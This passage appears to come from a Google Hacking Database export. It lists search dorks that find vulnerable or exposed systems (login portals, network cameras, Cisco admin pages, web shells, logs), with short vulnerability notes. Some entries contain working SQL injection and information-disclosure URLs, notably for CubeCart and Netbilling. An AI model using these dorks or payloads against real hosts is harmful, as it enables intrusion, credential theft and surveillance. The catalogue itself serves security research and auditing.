[descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&safe=off&c2coff=1&q=%22Copyright+%C2%A9+2002+Agustin+Dondo+Scripts%22&btnG=Search[url]] [[dork]"Copyright © 2002 Agustin Dondo Scripts"[dork]] [end][679]] [[start][680] [[title]"IMail Server Web Messaging" intitle:login[[title]] [[descr]IMail Server from Ipswitch is a messaging solution with 60 million users worldwide. It contains the features and safeguards you need without the complexity of expensive solutions like Microsoft Exchange® or groupware which challenges even the most experienced administrators.

This is a login portal search. Security Focus shows a list of vulnerabilities about this software.[descr]] [[url]http://www.google.com/search?q=%22IMail+Server+Web+Messaging%22+intitle:login&hl=en&lr=&filter=0[url]] [[dork]"IMail Server Web Messaging" intitle:login[dork]] [end][680]] [[start][681] [[title]intitle:"Directory Listing For" intext:Tomcat -intitle:Tomcat[[title]] [[descr]The Google Hackers Guide explains how to find Apache directory indexes, which are the most common found on the Internet. There are other ways however.

This query is a generic search for servers using Tomcat with directory listings enabled. They are a bit more fancy than Apache's default lists and more importantly they will not be found using "index.of".[descr]] [[url]http://www.google.com/search?hl=en&q=intitle%3A%22Directory+Listing+For%22+intext%3ATomcat+-intitle%3ATomcat[url]] [[dork]intitle:"Directory Listing For" intext:Tomcat -intitle:Tomcat[dork]] [end][681]] [[start][682] [[title]site:.viewnetcam.com -www.viewnetcam.com[[title]] [[descr]The FREE viewnetcam.com service allows you to create a personal web address (e.g., http://bob.viewnetcam.com) at which your camera's live image can be found on the Internet.

How the camera and service works: Special Software embedded within your Panasonic Network Camera gives your camera the ability to locate your unique Internet address. No matter what kind of Internet connection you have or which Internet provider you use, the viewnetcam.com service will keep your camera's Internet address permanent.[descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&safe=off&q=site%3A.viewnetcam.com+-www.viewnetcam.com[url]] [[dork]site:.viewnetcam.com -www.viewnetcam.com[dork]] [end][682]] [[start][683] [[title]inurl:/cgi-bin/finger? Enter (account|host|user|username)[[title]] [[descr]The finger command on unix displays information about the system users. This search displays the webinterface for that command.[descr]] [[url]http://www.google.com/search?hl=en&q=inurl%3A%2Fcgi-bin%2Ffinger%3F+Enter+%28account%7Chost%7Cuser%7Cusername%29+&btnG=Google+Search[url]] [[dork]inurl:/cgi-bin/finger? Enter (account|host|user|username) [dork]] [end][683]] [[start][684] [[title]inurl:/cgi-bin/finger? "In real life"[title]] [[descr]The finger command on unix displays information about the system users. This search displays pre-fingered users, so an attacker wouldn't even have to guess their accounts.[descr]] [[url]http://www.google.com/search?q=inurl:/cgi-bin/finger%3F+%22In+real+life%22&num=100&hl=en&lr=&ie=UTF-8&filter=0[url]] [[dork]inurl:/cgi-bin/finger? "In real life"[dork]] [end][684]] [[start][686] [[title]inurl:"calendar.asp?action=login"[title]] [[descr]aspWebCalendar is a browser based software package that runs over a standard web browser, such as Internet Explorer from Microsoft, and allows an organization of any size to easily and cost effectively provide personal and group calendar functions to everyone in the organization.

A vulnerability has been found for the (SQL version) script family from Full Revolution. Affected software is: aspWebAlbum, aspWebCalendar, aspWebHeadlines, aspWebMail.
You can check it here: http://www.securityfocus.com/bid/11246

Searches for aspWebAlbum and aspWebHeadlines:

inurl:"album.asp?action=login"
inurl:"news.asp?action=login" [descr]] [[url]http://www.google.com/search?hl=en&lr=&q=inurl%3A%22calendar.asp%3Faction%3Dlogin%22+&btnG=Search[url]] [[dork]inurl:"calendar.asp?action=login" [dork]] [end][686]] [[start][690] [[title]"Powered by CubeCart"[title]] [[descr]--------------------------------------------------------
Full path disclosure and sql injection on CubeCart 2.0.1
--------------------------------------------------------

[1]Introduction
[2]The Problem
[3]The Solution
[4]Timeline
[5]Feedback

##############################################################

[1]Introduction

"CubeCart is an eCommerce script written with PHP & MySQL. With CubeCart you can setup a powerful online store as long as you have hosting supporting PHP and one MySQL database."

This info was taken from hxxp://www.cubecart.com

CubeCart, from Brooky (hxxp://www.brooky.com), is a software formerly known as eStore.


[2]The Problem

A remote user can cause an error in index.php using the parameter 'cat_id' which is not properly validated, displaying the software's full installation path. It can also be used to inject sql commands. Examples follow:

(a) http://example.com/store/index.php?cat_id='

causes an error like this:

"Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/example/public_html/store/link_navi.php on line 35

Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/example/public_html/store/index.php on line 170

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/example/public_html/store/index.php on line 172"


(b) http://example.com/store/index.php?cat_id=1 or 1=1--

displays all categories in the database


[3]The Solution

None at this time. Vendor contacted and fix will be available soon.


[4]Timeline

(2/10/2004) Vulnerability discovered
(2/10/2004) Vendor notified
(3/10/2004) Vendor response


[5]Feedback

Comments and stuff to cybercide@megamail.pt
[descr]] [[url]http://www.google.com/search?hl=en&lr=&ie=UTF-8&q=%22Powered+by+CubeCart%22&btnG=Search[url]] [[dork]"Powered by CubeCart"[dork]] [end][690]] [[start][694] [[title]inurl:confixx inurl:login|anmeldung[[title]] [[descr]Confixx is a webhosting management tool and has the following features:
* create resellers,
* edit personal data,
* manage newsletters to resellers,
* comprehensive stats,
* powerful evaluation of traffic,
* manage e-mail templates,
* lock resellers.

Security Focus has a vulnerability report on this.

vendor: http://www.sw-soft.com/en/products/confixx/[descr]] [[url]http://www.google.com/search?hl=en&lr=&ie=UTF-8&newwindow=1&q=inurl%3Aconfixx+inurl%3Alogin%7Canmeldung&btnG=Search[url]] [[dork]inurl:confixx inurl:login|anmeldung[dork]] [end][694]] [[start][695] [[title]"VHCS Pro ver" -demo[[title]] [[descr]VHCS is professional Control Panel Software for Shared, Reseller, vServer and Dedicated Servers.

No vulnerabilities are reported to Security Focus.[descr]] [[url]http://www.google.com/search?q=%22VHCS+Pro+++ver%22+-demo&num=100&hl=en&lr=&newwindow=1&c2coff=1&safe=off&filter=0[url]] [[dork]"VHCS Pro ver" -demo[dork]] [end][695]] [[start][696] [[title]intitle:"Virtual Server Administration System"[title]] [[descr]VISAS, German control panel software like confixx.

No vulnerabilities are reported to Security Focus.[descr]] [[url]http://www.google.com/search?hl=en&lr=&ie=UTF-8&newwindow=1&q=intitle%3A%22Virtual+Server+Administration+System%22[url]] [[dork]intitle:"Virtual Server Administration System"[dork]] [end][696]] [[start][697] [[title]"SysCP - login"[title]] [[descr]SysCP: Open Source server management tool for Debian Linux

No vulnerabilities are reported to Security Focus.[descr]] [[url]http://www.google.com/search?hl=en&lr=&ie=UTF-8&newwindow=1&q=%22SysCP+-+login%22[url]] [[dork]"SysCP - login"[dork]] [end][697]] [[start][698] [[title]intitle:"ISPMan : Unauthorized Access prohibited"[title]] [[descr]ISPMan is a distributed system to manage components of ISP from a central management interface.

No vulnerabilities are reported to Security Focus.
[descr]] [[url]http://www.google.com/search?hl=en&lr=&ie=UTF-8&newwindow=1&q=intitle%3A%22ISPMan+%3A+Unauthorized+Access+prohibited%22&btnG=Search[url]] [[dork]intitle:"ISPMan : Unauthorized Access prohibited"[dork]] [end][698]] [[start][699] [[title]"Login - Sun Cobalt RaQ"[title]] [[descr]The famous Sun linux appliance. Nice clean portal search.

Various vulnerabilities are reported to Security Focus.[descr]] [[url]http://www.google.com/search?hl=en&lr=&ie=UTF-8&newwindow=1&q=%22Login+-+Sun+Cobalt+RaQ%22[url]] [[dork]"Login - Sun Cobalt RaQ"[dork]] [end][699]] [[start][700] [[title]"OPENSRS Domain Management" inurl:manage.cgi[[title]] [[descr]OpenSRS Domain Management System

No vulnerabilities are reported to Security Focus.
[descr]] [[url]http://www.google.com/search?hl=en&lr=&ie=UTF-8&newwindow=1&q=%22OPENSRS+Domain+Management%22+inurl%3Amanage.cgi[url]] [[dork]"OPENSRS Domain Management" inurl:manage.cgi[dork]] [end][700]] [[start][701] [[title]intitle:plesk inurl:login.php3[[title]] [[descr]Plesk is server management software developed for the Hosting Service Industry. Various vulnerabilities are reported to security focus.[descr]] [[url]http://www.google.com/search?hl=en&lr=&ie=UTF-8&newwindow=1&q=intitle%3Aplesk+inurl%3Alogin.php3[url]] [[dork]intitle:plesk inurl:login.php3[dork]] [end][701]] [[start][702] [[title]inurl:"level/15/exec/-/show"[title]] [[descr]This search finds Cisco devices which have level 15 access open via webinterface. If an attacker wants to search for another level he can replace the "15" with this level. Levels below 10 need a leading zero (e.g. 04).

Currently only the cached pages can be viewed. [descr]] [[url]http://www.google.com/search?q=inurl:%22level/15/exec/-/show%22&num=100&hl=en&lr=&c2coff=1&safe=off&filter=0[url]] [[dork]inurl:"level/15/exec/-/show"[dork]] [end][702]] [[start][703] [[title]inurl:/dana-na/auth/welcome.html[[title]] [[descr]Neoteris Instant Virtual Extranet (IVE) has been reported prone to a cross-site scripting vulnerability.

The issue presents itself, due to a lack of sufficient sanitization performed on an argument passed to an IVE CGI script. An attacker may exploit this vulnerability to hijack valid Neoteris IVE sessions.

advisories:

http://secunia.com/product/1558/
http://www.securityfocus.com/bid/7510

[descr]] [[url]http://www.google.com/search?hl=en&lr=&ie=UTF-8&q=inurl%3A%2Fdana-na%2Fauth%2Fwelcome.html&btnG=Search&X=1&filter=0[url]] [[dork]inurl:/dana-na/auth/welcome.html[dork]] [end][703]] [[start][704] [[title]ext:nsf nsf -gov -mil[[title]] [[descr]Domino is server technology which transforms Lotus Notes® into an Internet applications server. Domino brings together the open networking environment of Internet standards and protocols with the powerful application development facilities of Notes, providing you with the ability to rapidly develop a broad range of business applications for the Internet and Intranet.

This is a generic search for Lotus Domino files. It identifies Domino users. Search the GHDB for more variations on this theme.[descr]] [[url]http://www.google.com/search?hl=en&q=ext%3Ansf+nsf+-gov+-mil[url]] [[dork]ext:nsf nsf -gov -mil[dork]] [end][704]] [[start][705] [[title]inurl:statrep.nsf -gov[[title]] [[descr]Domino is server technology which transforms Lotus Notes® into an Internet applications server. Domino brings together the open networking environment of Internet standards and protocols with the powerful application development facilities of Notes, providing you with the ability to rapidly develop a broad range of business applications for the Internet and Intranet.

This search finds statistics pages generated by Domino. Information on these pages includes Operating System, Disk space, Usernames and full path disclosure.

Example:

* 1. Statistics Reports - 1. System
* 1. Statistics Reports - 2. Mail & Database
* 1. Statistics Reports - 3. Communications
* 1. Statistics Reports - 4. Network
* 1. Statistics Reports - 5. Clusters
* 1. Statistics Reports - 6. Web Server & Retriever
* 1. Statistics Reports - 7. Calendaring Scheduling
* 2. Alarms
* 3. Events
* 4. Spreadsheet Export
* 5. Graphs - 1. System Statistics
* 5. Graphs - 2. System Loads
* 5. Graphs - 3. System Resources
* 6. Trouble Tickets - 1. Alarm
* 6. Trouble Tickets - 2. Event
* 7. Analysis Report
* 8. File Statistics
* 9. Single Copy Object Store Statistics
[descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&safe=off&c2coff=1&q=inurl%3Astatrep.nsf+-gov[url]] [[dork]inurl:statrep.nsf -gov[dork]] [end][705]] [[start][706] [[title]inurl:log.nsf -gov[[title]] [[descr]Domino is server technology which transforms Lotus Notes® into an Internet applications server. Domino brings together the open networking environment of Internet standards and protocols with the powerful application development facilities of Notes, providing you with the ability to rapidly develop a broad range of business applications for the Internet and Intranet.

This search finds Domino log files. These can be revealing, including information about dbconnect.nsf files, path information, etc.

Example:

* Database-Sizes
* Database-Usage
* Mail Routing Events
* Miscellaneous Events
* NNTP Events
* Object Store Usage
* Passthru Connections
* Phone Calls-By Date
* Phone Calls-By User
* Replication Events
* Sample Billing
* Usage-By Date
* Usage-By User

Example:

2004/04/14 07:51:00 AM ATTEMPT TO ACCESS DATABASE mtstore.ntf by itisdom/ITIS/ITRI was denied[descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&safe=off&c2coff=1&q=inurl%3Alog.nsf+-gov[url]] [[dork]inurl:log.nsf -gov[dork]] [end][706]] [[start][707] [[title]inurl:login.php "SquirrelMail version"[title]] [[descr]SquirrelMail is a standards-based webmail package written in PHP4. It includes built-in pure PHP support for the IMAP and SMTP protocols, and all pages render in pure HTML 4.0 (with no JavaScript required) for maximum compatibility across browsers. It has very few requirements and is very easy to configure and install. SquirrelMail has all the functionality you would want from an email client, including strong MIME support, address books, and folder manipulation. [descr]] [[url]http://www.google.com/search?hl=en&lr=&client=firefox-a&q=inurl%3Alogin.php+%22SquirrelMail+version%22&btnG=Search[url]] [[dork]inurl:login.php "SquirrelMail version"[dork]] [end][707]] [[start][708] [[title]"Ideal BB Version: 0.1" -idealbb.com[[title]] [[descr]Ideal BB has been a popular choice for powering web based bulletin boards and we are now proud to introduce our next generation bulletin board Ideal BB.NET. Ideal Science IdealBB is reported prone to multiple unspecified input validation vulnerabilities. These issues result from insufficient sanitization of user-supplied data.

Securityfocus currently has 3 reports on idealBB.[descr]] [[url]http://www.google.com/search?hl=en&ie=ISO-8859-1&q=%22Ideal+BB+Version%3A+0.1%22+-idealbb.com&btnG=Google-Suche&meta=[url]] [[dork]"Ideal BB Version: 0.1" -idealbb.com[dork]] [end][708]] [[start][709] [[title](inurl:81/cgi-bin/.cobalt/) | (intext:"Welcome to the Cobalt RaQ")[[title]] [[descr]The famous Sun linux appliance. The default page displays this text:

"Congratulations on Choosing a Cobalt RaQ - the premier server appliance platform for web hosting. This page can easily be replaced with your own page. To replace this page, transfer your new content to the directory /home/sites/home/web".[descr]] [[url]http://www.google.com/search?hl=en&lr=&client=firefox-a&q=%28inurl%3A81%2Fcgi-bin%2F.cobalt%2F%29++%7C+%28intext%3A%22Welcome+to+the+Cobalt+RaQ%22+%29&btnG=Search[url]] [[dork](inurl:81/cgi-bin/.cobalt/) | (intext:"Welcome to the Cobalt RaQ" )[dork]] [end][709]] [[start][710] [[title]"Powered by YaPig V0.92b"[title]] [[descr]YaPiG is reported to contain an HTML injection vulnerability.
The problem is reported to present itself due to a lack of sanitization performed on certain field data.

This may allow an attacker to inject malicious HTML and script code into the application.

http://www.securityfocus.com/bid/11452
[descr]] [[url]http://www.google.com/search?hl=en&q=%22Powered+by+YaPig+V0.92b%22&btnG=Google+Search[url]] [[dork]"Powered by YaPig V0.92b"[dork]] [end][710]] [[start][712] [[title]intitle:"toshiba network camera - User Login"[title]] [[descr]Web interface of Toshiba network cameras.[descr]] [[url]http://www.google.com/search?hl=en&ie=ISO-8859-1&q=intitle%3A%22toshiba+network+camera+-+User+Login%22&btnG=Suche&meta=[url]] [[dork]intitle:"toshiba network camera - User Login"[dork]] [end][712]] [[start][713] [[title]inurl:"/site/articles.asp?idcategory="[title]] [[descr]Dwc_Articles is an ASP application designed to add Featured,
Recent and Popular News through an easy to use administration area.
Other features: Design Packages, Add, Modify, Deactivate through HTML/Wysiwyg Editor,

Nearly all scripts suffer from possible sql injections.

http://www.securityfocus.com/bid/11509[descr]] [[url]http://www.google.com/search?hl=en&ie=ISO-8859-1&q=inurl%3A%22%2Fsite%2Farticles.asp%3Fidcategory%3D%22+&btnG=Google-Suche&meta=[url]] [[dork]inurl:"/site/articles.asp?idcategory=" [dork]] [end][713]] [[start][714] [[title]index.of.dcim[[title]] [[descr]The DCIM directory is the default name for a few brands of digital cameras. This is not a big network security risk, but like netcams it can reveal juicy details if found on corporate intranets.[descr]] [[url]http://www.google.com/search?q=index.of.dcim&sourceid=mozilla-search&start=0&start=0&ie=utf-8&oe=utf-8[url]] [[dork]index.of.dcim[dork]] [end][714]] [[start][715] [[title]intitle:"Router Setup Home" Home Help Login Internet Status[[title]] [[descr]Belkin DSL/Cable Routers. These routers are shipped with a blank remote access password. An attacker will need to log in before changing any settings, unless it's left blank.[descr]] [[url]http://www.google.com/search?q=intitle:%22Router+Setup+Home%22+Home+Help+Login+Internet+Status&num=100&hl=en&lr=&c2coff=1&safe=off&filter=0[url]] [[dork]intitle:"Router Setup Home" Home Help Login Internet Status[dork]] [end][715]] [[start][717] [[title]"Portal engine source code * copyright © 2002-2004 * DotNetNuke." -site:dotnetnuke.com[[title]] [[descr]Just a search for DotNetNuke. A friend was thinking of installing it so I started to search for them.

Search SF for a vulnerability report.[descr]] [[url]http://www.google.com/search?q=%22Portal+engine+source+code+*+copyright+%C2%A9+2002-2004+*+DotNetNuke.%22+-site%3Adotnetnuke.com[url]] [[dork]"Portal engine source code * copyright © 2002-2004 * DotNetNuke." -site:dotnetnuke.com[dork]] [end][717]] [[start][718] [[title]linksys camera inurl:main.cgi[[title]] [[descr]Linksys web cameras. There's a cross-site scripting vuln in the way Linksys uses the next_file argument with main.cgi as well. I just saw these pop up on the shelves at Best Buy.[descr]] [[url]http://www.google.com/search?hl=en&lr=&client=firefox-a&q=linksys+camera++inurl%3Amain.cgi&btnG=Search[url]] [[dork]linksys camera inurl:main.cgi[dork]] [end][718]] [[start][719] [[title]intitle:"phpremoteview" filetype:php "Name, Size, Type, Modify"[title]] [[descr]phpRemoteView is a web-based file manager with a basic shell. With this an attacker can browse the server filesystem and use the online PHP interpreter.

vendor: http://php.spb.ru/remview/ (Russian)[descr]] [[url]http://www.google.com/search?q=intitle%3A%22phpremoteview%22+filetype%3Aphp+%22Name%2C+Size%2C+Type%2C+Modify%22[url]] [[dork]intitle:"phpremoteview" filetype:php "Name, Size, Type, Modify"[dork]] [end][719]] [[start][720] [[title]intitle:"index of" -inurl:htm -inurl:html mp3[[title]] [[descr]Yes! I probably should have told you guys earlier, but this is how I've been getting 100% of my mp3s. It fricken rocks, use it and abuse it. Downfalls to it... a) sometimes you shouldn't include mp3 in the query and getting what you want takes several different methods of searching b) a lot of the time Google gives you results and they are not there thanks to good old friend 404 c) finding stuff takes a lot of practice. Goods... a) I've found whole albums b) I've mass downloaded directories of hundreds of songs that I have interest in c) it's exciting seeing the results, like finding treasure.[descr]] [[url]http://www.google.com/search?q=intitle%3A%22index+of%22+-inurl%3Ahtm+-inurl%3Ahtml+mp3[url]] [[dork]intitle:"index of" -inurl:htm -inurl:html mp3[dork]] [end][720]] [[start][721] [[title]intitle:"Index of" upload size parent directory[[title]] [[descr]Files uploaded through FTP by other people; sometimes you can find all sorts of things, from movies to important stuff. [descr]] [[url]http://www.google.com/search?num=100&q=intitle%3A%22Index+of%22+upload+size+parent+directory[url]] [[dork]intitle:"Index of" upload size parent directory[dork]] [end][721]] [[start][722] [[title][[title]] [[descr][descr]] [[url]http://www.google.com/[url]] [[dork][dork]] [end][722]] [[start][723] [[title][[title]] [[descr][descr]] [[url]http://www.google.com/[url]] [[dork][dork]] [end][723]] [[start][724] [[title]filetype:cgi inurl:nbmember.cgi[[title]] [[descr]vulnerable Netbilling nbmember.cgi

Netbilling 'nbmember.cgi' script is reported prone to an information disclosure vulnerability. This issue may allow remote attackers to gain access to user authentication credentials and potentially sensitive configuration information.

The following proof of concept is available:
http://www.example.com/cgi-bin/nbmember.cgi?cmd=test
http://www.example.com/cgi-bin/nbmember.cgi?cmd=list_all_users&keyword=hereistheaccesskeyword

http://www.securityfocus.com/bid/11504[descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&safe=off&c2coff=1&q=filetype%3Acgi+inurl%3Anbmember.cgi&btnG=Search[url]] [[dork]filetype:cgi inurl:nbmember.cgi[dork]] [end][724]] [[start][725] [[title]"Powered by Coppermine Photo Gallery"[title]] [[descr]published Oct 20, 2004, updated Oct 20, 2004

vulnerable:

Coppermine Photo Gallery Coppermine Photo Gallery 1.0
Coppermine Photo Gallery Coppermine Photo Gallery 1.1
Coppermine Photo Gallery Coppermine Photo Gallery 1.2
Coppermine Photo Gallery Coppermine Photo Gallery 1.2.1
Coppermine Photo Gallery Coppermine Photo Gallery 1.3
Coppermine Photo Gallery Coppermine Photo Gallery 1.3.1
Coppermine Photo Gallery Coppermine Photo Gallery 1.3.2

Coppermine Photo Gallery is reported prone to a design error that may allow users to cast multiple votes for a picture.

All versions of Coppermine Photo Gallery are considered vulnerable at the moment.

http://www.securityfocus.com/bid/11485[descr]] [[url]http://www.google.com/search?hl=en&q=%22Powered+by+Coppermine+Photo+Gallery%22+&btnG=Google+Search[url]] [[dork]"Powered by Coppermine Photo Gallery" [dork]] [end][725]] [[start][726] [[title]"Powered by WowBB" -site:wowbb.com[[title]] [[descr]WowBB is reportedly affected by multiple input validation vulnerabilities. These issues are due to a failure of the application to properly sanitize user-supplied input prior to including it in dynamic web content and SQL database queries.

An attacker can leverage these issues to manipulate or reveal database contents through SQL injection attacks as well as carry out other attacks and steal cookie-based authentication credentials through cross-site scripting attacks.

http://www.securityfocus.com/bid/11429
http://www.wowbb.com/[descr]] [[url]http://www.google.com/search?hl=en&q=%22Powered+by+WowBB%22+-site%3Awowbb.com+&btnG=Google+Search[url]] [[dork]"Powered by WowBB" -site:wowbb.com [dork]] [end][726]] [[start][727] [[title]"Powered by ocPortal" -demo -ocportal.com[[title]] [[descr]Reportedly ocPortal is affected by a remote file include vulnerability. This issue is due to a failure of the application to sanitize user supplied URI input.

An attacker might leverage this issue to run arbitrary server side script code on a vulnerable computer with the privileges of the web server process. This may potentially result in a compromise of the vulnerable computer as well as other attacks.

http://www.securityfocus.com/bid/11368[descr]] [[url]http://www.google.com/search?hl=en&q=%22Powered+by+ocPortal%22+-demo+-ocportal.com+&btnG=Google+Search[url]] [[dork]"Powered by ocPortal" -demo -ocportal.com [dork]] [end][727]] [[start][728] [[title]inurl:"slxweb.dll"[title]] [[descr]SalesLogix is the Customer Relationship Management solution that drives sales performance in small to medium-sized businesses through Sales, Marketing, and Customer Support automation and back-office integration.

The problem:

By manipulating the cookies used by the Web Client, it is possible to trick the server into authenticating a remote user as the CRM administrator without requiring a password.

It is also possible to perform SQL injection attacks on the SQL server that is used as the data store for the SalesLogix CRM system, reveal detailed error reports contained in HTTP headers and disclose the real filesystem paths to various SalesLogix directories.

The SalesLogix server itself is vulnerable to an attack that would allow a malicious user to obtain the username and password used to access the SQL server used as a data store. The disclosed username and password always have read/write permissions on the database.

Another vulnerability in the SalesLogix server allows an unauthenticated user to upload arbitrary files to the server in any directory (s)he chooses.


http://www.securityfocus.com/bid/11450[descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&safe=off&c2coff=1&q=inurl%3A%22slxweb.dll%22+&btnG=Search[url]] [[dork]inurl:"slxweb.dll" [dork]] [end][728]] [[start][729] [[title]"Powered by DMXReady Site Chassis Manager" -site:dmxready.com[[title]] [[descr]It is reported that DMXReady Site Chassis Manager is susceptible to two remotely exploitable input validation vulnerabilities. These vulnerabilities are due to a failure of the application to properly sanitize user-supplied data.

The first issue is an unspecified cross-site scripting vulnerability. This issue could permit a remote attacker to create a malicious URI link that includes hostile HTML and script code. If this link were to be followed, the hostile code may be rendered in the web browser of the victim user. This would occur in the security context of the affected web site and may allow for theft of cookie-based authentication credentials or other attacks.

The second issue is an unspecified SQL injection vulnerability. It may be possible for a remote user to inject arbitrary SQL queries into the underlying database used by the application. This could permit remote attackers to pass malicious input to database queries, resulting in modification of query logic or other attacks.

Successful exploitation could result in compromise of the application, disclosure or modification of data or may permit an attacker to exploit vulnerabilities in the underlying database implementation.[descr]] [[url]http://www.google.com/search?hl=en&q=%22Powered+by+DMXReady+Site+Chassis+Manager%22+-site%3Admxready.com&btnG=Google+Search[url]] [[dork]"Powered by DMXReady Site Chassis Manager" -site:dmxready.com[dork]] [end][729]] [[start][730] [[title]"Powered by My Blog" intext:"FuzzyMonkey.org"[title]] [[descr]FuzzyMonkey My Blog is vulnerable to multiple input validation vulnerabilities. These issues are caused by a failure to validate and filter user-supplied strings before including them in dynamic Web page content.

An attacker could leverage these issues to carry out cross-site scripting attacks against unsuspecting users, facilitating theft of cookie-based authentication credentials as well as other attacks.

vulnerable FuzzyMonkey My Blog 1.15
FuzzyMonkey My Blog 1.16
FuzzyMonkey My Blog 1.17
FuzzyMonkey My Blog 1.18
FuzzyMonkey My Blog 1.19
FuzzyMonkey My Blog 1.20

not vulnerable FuzzyMonkey My Blog 1.21

They also have several other scripts, which may or may not be vulnerable. But remember Murphy's law also applies to software writers.

# My Photo Gallery (picture and file sharing software)
# My Calendar (quick and easy web calendar)
# My Voting Script
# My Guestbook

http://www.securityfocus.com/bid/11325[descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&safe=off&c2coff=1&q=%22Powered+by+My+Blog%22+intext%3A%22FuzzyMonkey.org%22&btnG=Search[url]] [[dork]"Powered by My Blog" intext:"FuzzyMonkey.org"[dork]] [end][730]] [[start][731] [[title]inurl:wiki/MediaWiki[[title]] [[descr]MediaWiki is reported prone to a cross-site scripting vulnerability. This issue arises due to insufficient sanitization of user-supplied data. A remote attacker may exploit this vulnerability to execute arbitrary HTML and script code in the browser of a vulnerable user.

bugtraq id 11480
object
class Input Validation Error
cve CVE-MAP-NOMATCH

remote Yes
local No
published Oct 18, 2004
updated Oct 20, 2004
vulnerable MediaWiki MediaWiki 1.3
MediaWiki MediaWiki 1.3.1
MediaWiki MediaWiki 1.3.2
MediaWiki MediaWiki 1.3.3
MediaWiki MediaWiki 1.3.4
MediaWiki MediaWiki 1.3.5
MediaWiki MediaWiki 1.3.6

not vulnerable MediaWiki MediaWiki 1.3.7
[descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&safe=off&c2coff=1&q=inurl%3Awiki%2FMediaWiki&btnG=Search[url]] [[dork]inurl:wiki/MediaWiki[dork]] [end][731]] [[start][732] [[title]"inurl:/site/articles.asp?idcategory="[title]] [[descr]Dwc_Articles is an ASP application designed to add Featured, Recent and Popular News through an easy to use administration area. Other features: Design Packages, Add, Modify, Deactivate through HTML/Wysiwyg Editor, Upload, categories, Multiple Users and more.

Nearly all scripts suffer from possible SQL injections. This may allow an attacker to change website content or, even worse, log in as an admin.

vulnerable: <= 1.6 are vulnerable (others not yet confirmed)
Status: No email address or phone number known, so vendor could not be contacted.
author: l0om (http://www.excluded.org)
vendor: www.distinctwebcreations.com
Possible workaround: remove or rename the admin scripts.

[descr]] [[url]http://www.google.com/search?hl=en&q=%22inurl%3A%2Fsite%2Farticles.asp%3Fidcategory%3D%22+&btnG=Google+Search[url]] [[dork]"inurl:/site/articles.asp?idcategory=" [dork]] [end][732]] [[start][733] [[title]"Enter ip" inurl:"php-ping.php"[title]] [[descr]It has been reported that php-ping may be prone to a remote command execution vulnerability that may allow remote attackers to execute commands on vulnerable systems. The problem exists due to insufficient sanitization of shell
metacharacters via the 'count' parameter of php-ping.php script.

report: http://www.securityfocus.com/bid/9309/info/
sample: http://img64.exs.cx/my.php?loc=img64&image=phpping.jpg
[descr]] [[url]http://www.google.com/search?hl=en&lr=&c2coff=1&client=firefox-a&q=%22Enter+ip%22+inurl%3A%22php-ping.php%22&btnG=Search[url]] [[dork]"Enter ip" inurl:"php-ping.php"[dork]] [end][733]] [[start][734] [[title]"File Upload Manager v1.3" "rename to"[title]] [[descr]thepeak File Upload Manager lets you manage your webtree by uploading and downloading files.[descr]] [[url]http://www.google.com/search?hl=en&lr=&ie=ISO-8859-1&q=%22File+Upload+Manager+v1.3%22+%22rename+to%22&btnG=Search[url]] [[dork]"File Upload Manager v1.3" "rename to"[dork]] [end][734]] [[start][735] [[title]inurl:click.php intext:PHPClickLog [[title]] [[descr]A script written in PHP 4 that logs a user's statistics when they click on a link.
The log is stored in a flat-file (text) database and can be viewed/inspected through an administration section.[descr]] [[url]http://www.google.com/search?hl=en&lr=&ie=ISO-8859-1&q=inurl%3Aclick.php+intext%3APHPClickLog+%0D%0A&btnG=Search[url]] [[dork]inurl:click.php intext:PHPClickLog [dork]] [end][735]] [[start][736] [[title]intitle:welcome.to.horde[[title]] [[descr]Horde Mail is web-based email software, great for checking messages on the road. Several vulnerabilities were reported to Security Focus.[descr]] [[url]http://www.google.com/search?q=intitle:welcome.to.horde&hl=en&lr=&filter=0[url]] [[dork]intitle:welcome.to.horde[dork]] [end][736]] [[start][737] [[title]"BlackBoard 1.5.1-f | © 2003-4 by Yves Goergen"[title]] [[descr]bugtraq id 11336
object
class Input Validation Error
cve CVE-MAP-NOMATCH

remote Yes
local No
published Oct 06, 2004
updated Oct 06, 2004
vulnerable BlackBoard Internet Newsboard System BlackBoard Internet Newsboard System 1.5.1

BlackBoard Internet Newsboard System is reported prone to a remote file include vulnerability. This issue presents itself because the application fails to sanitize user-supplied data properly. This issue may allow an attacker to include malicious files containing arbitrary script code to be executed on a vulnerable computer.

BlackBoard Internet Newsboard System version 1.5.1 is reported prone to this vulnerability. It is possible that prior versions are affected as well.[descr]] [[url]http://www.google.com/search?q=%22BlackBoard+1.5.1-f+%7C+%C2%A9+2003-4+by+Yves+Goergen%22&hl=en&lr=&filter=0[url]] [[dork]"BlackBoard 1.5.1-f | © 2003-4 by Yves Goergen"[dork]] [end][737]] [[start][740] [[title]inurl:explorer.cfm inurl:(dirpath|This_Directory)[[title]] [[descr]Filemanager without authentication. [descr]] [[url]http://www.google.com/search?hl=en&lr=&c2coff=1&client=firefox-a&q=inurl%3Aexplorer.cfm+inurl%3A%28dirpath%7CThis_Directory%29&btnG=Search[url]] [[dork]inurl:explorer.cfm inurl:(dirpath|This_Directory)[dork]] [end][740]] [[start][741] [[title]filetype:php inurl:wiki (inurl:"SystemInfo" | inurl:FindPage| inurl:HelpContents| inurl:RecentChanges)[[title]] [[descr]MoniWiki MoniWiki 1.0.8

It is reported that MoniWiki is susceptible to a cross-site scripting vulnerability. This issue is due to a failure of the application to properly sanitize user-supplied URI input prior to including it in dynamic web page content.

This issue could permit a remote attacker to create a malicious URI link that includes hostile HTML and script code. If this link were to be followed, the hostile code may be rendered in the web browser of the victim user. This would occur in the security context of the affected web site and may allow for theft of cookie-based authentication credentials or other attacks.

An attacker could also search for:
1. "powerd by MoniWiki"
